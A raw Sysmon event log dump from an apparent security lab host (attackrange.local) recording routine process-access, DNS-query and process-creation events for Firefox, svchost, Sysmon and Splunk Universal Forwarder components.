Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.172{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.186{59A5CD1D-945A-6005-3305-00000000A301}7052pagead46.l.doubleclick.net02a00:1450:4001:815::2002;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:37.074{59A5CD1D-945A-6005-3305-00000000A301}7052www.llanfairpwllgwyngyllgogerychwyrndrobwllllantysiliogogogochuchaf.eu9003-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:39.181{59A5CD1D-945A-6005-3305-00000000A301}7052prod-tp.sumo.mozit.cloud9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:39.180{59A5CD1D-945A-6005-3305-00000000A301}7052prod-tp.sumo.mozit.cloud044.238.113.124;34.214.67.134;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:39.179{59A5CD1D-945A-6005-3305-00000000A301}7052support.mozilla.org0type: 5 prod-tp.sumo.mozit.cloud;::ffff:34.214.67.134;::ffff:44.238.113.124;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.501{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 